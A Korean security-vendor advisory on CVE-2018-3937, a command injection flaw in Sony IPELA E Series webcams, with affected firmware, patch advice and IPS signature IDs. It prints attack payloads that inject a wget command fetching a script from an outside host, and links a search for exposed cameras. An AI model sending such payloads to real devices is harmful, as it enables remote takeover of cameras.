Wins blog

글로벌 정보보안 파트너! Global Security  No.1 윈스는 국가대표 정보보안 기업에서 글로벌 강소기업으로 도약합니다.

보안 정보

앞 내용 보기 다음 내용 보기
취약점 정보[CVE-2018-3937] 취약점에 노출된 6천대의 Sony 웹캠
작성일 2018-08-02 조회 2154

 

 

 


7월 20일 Sony-IPELA-E Series 웹캠이 원격 명령 Injection 취약점(CVE-2018-3937)이 발표되었습니다.
8월 2일 현재 검색 결과 인터넷에 노출되어 있는 취약한 웹캠은 미국과 베트남을 중심으로 6000천대 이상이 있습니다.

 

 

그림 1) 인터넷에 노출되어 있는 취약한 Sony 웹캠 (https://www.zoomeye.org/searchResult?q=%2Bapp%20%3A%22Sony%20Network%20Camera%20httpd%22)

 

 

해당 취약점은 인증되지 않은 사용자가 command/main.cgi 파일을 호출해 네트워크 성능을 측정하는 과정에 잘못된 구문처리 오류로 발생합니다.

 

소니 IPELA 카메라는 네트워크 성능 측정을 위해 main.cgi를 이용해 ipref명령을 활용합니다.

 

원격의 공격자는 취약한 Sony IPELA E Series Camera를 검색한 후, 해당 시스템에 iperf(네트워크 성능을 측정)을 요청합니다.
해당 요청을 전달 받은 시스템은 measurementBitrateExec 함수를 호출해 전달받은 페이로드 구문을 해석하는데 ','(Comma)를 구분자로 이용합니다.

공격자는 구분자로 사용되는 ','(Comma) 이전에 명령 구문을 삽입해 원하는 명령을 수행할 수 있습니다.

 

 

정상 페이로드
measurement=bitrate,client,8.8.8.8,udp,123
measurement=bitrate,client,8.8.8.8,tcp,123
공격 페이로드
measurement=bitrate,client,8.8.8.8$(wget http://1.1.1.1/malware.js),udp,123
measurement=bitrate,client,8.8.8.8
$(wget http://1.1.1.1/malware.js),tcp,123

표 1) 공격 페이로드/정상 페이로드 비교

 

 

그림 2) Command Injection이 포함된 공격 패킷

 

 

공격에 성공하면 임의 코드 실행 또는 정보 유출 등이 가능합니다.

 

 

 


취약시스템

Sony IPELA E series SNC-RH124 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-RH164 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-RS46N G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-RS86N G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH140 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH180 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH240 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH280 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH180 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH240 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH280 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH110 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH210 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH110 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH110T G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH210 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH210T G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EP104 G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EP154 G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EX101E G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EX104 G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EX154 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH120 G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EX154 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH160 G5 firmware 1.87.00 and prior
Sony IPELA E series SNT-EX154 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH220 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-CH260 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH120 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH160 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH220 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-DH260 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ZB550 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ZM550 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-EP550 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-EP580 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ER550 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ER580 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ER585 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ZP550 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ZR550 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-EP520 G5 firmware 1.87.00 and prior
Sony IPELA E series SNC-ER520 G5 firmware 1.87.00 and prior

 

 

 


해결방안

1. 외부의 인증되지 않은 사용자로부터 웹 접근을 차단한다.
2. 벤더사에서 권고하는 최신의 패치를 설치한다.
https://www.sony.jp/snc/info/20180725.html

 

 

 

 

Sniper 제품군 대응방안

Sniper-IPS

[4406] Sony IPELA E Series Camera Command Injection

Sniper-UTM

[805374626] Sony IPELA E Series Camera Command Injection

Sniper-APTX

[3659] Sony IPELA E Series Camera Command Injection

 

 

 

 

참조

https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0604
https://paper.seebug.org/654/

첨부파일 첨부파일이 없습니다.
태그 CVE-2018-3937  Sony IPELA